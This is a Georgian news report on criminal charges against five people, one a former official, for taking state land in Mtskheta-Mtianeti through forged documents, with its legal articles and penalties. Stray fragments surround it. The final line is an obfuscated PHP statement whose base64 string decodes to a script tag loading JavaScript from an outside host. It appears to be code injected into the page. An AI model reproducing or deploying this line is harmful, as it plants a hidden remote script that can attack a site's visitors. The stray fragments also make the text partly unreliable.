celsiusi
ავერსი შნაიდერი

ყალბი ოფიციალური დოკუმენტების დამზადება-გამოყენების გზით, დიდი ოდენობით სახელმწიფო ქონების მოტყუებით დაუფლებისა და სამსახურებრივი გულგრილობის ფაქტზე, ხუთი პირის მიმართ, რომელთაგან ერთი ყოფილი მოხელეა, სისხლისსამართლებრივი დევნა დაიწყო, - ინფორმაციას ფინანსთა სამინისტროს საგამოძიებო სამსახური ავრცელებს.

გამოძიებით დადგინდა, რომ ბრალდებულმა, 2020-2021 წლებში, მცხეთა-მთიანეთის რეგიონში, ყალბი დოკუმენტების გამოყენებით, ცრუ მოწმეების დახმარებითა და ერთ-ერთი მუნიციპალიტეტის თანამშრომლის მიერ სამსახურებრივი მოვალეობების არაჯეროვანი შესრულების შედეგად, მოტყუებით დაირეგისტრირა, საერთო ჯამში 2 528 020 ლარის ღირებულების 28 486 მ2 ფართობის 4 მიწის ნაკვეთი.

„ბრალდებულის მხრიდან ადგილი ჰქონდა ყალბი დოკუმენტების გამოყენებით, დამატებით  2 507 736 ლარის ღირებულების, 32 483 კვ.მ. ფართობის 5 მიწის ნაკვეთის მოტყუებით რეგისტრაციის მცდელობის ფაქტს, რაც აღკვეთილ იქნა საგამოძიებო მოქმედებების ოპერატიულად და ეფექტურად განხორციელების შედეგად.

გამოძიების პროცესში დაყადაღებულ იქნა მართლსაწინააღმდეგოდ დაუფლებული მიწის ნაკვეთები.

მიმდინარეობს შესაბამისი სამართლებრივი პროცედურები თაღლითურად მისაკუთრებული მიწის ნაკვეთების სახელმწიფო საკუთრებაში დაბრუნების მიზნით“ - ნათქვამია უწყების მიერ გავრცელებულ განცხადებაში. 

საქმეზე გამოძიება საქართველოს სისხლის სამართლის კოდექსის 362-ე, 180-ე და 342-ე მუხლებით გრძელდება, რაც სასჯელის სახით თავისუფლების აღკვეთას 6-დან 9 წლამდე ვადით ითვალისწინებს. 

319
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");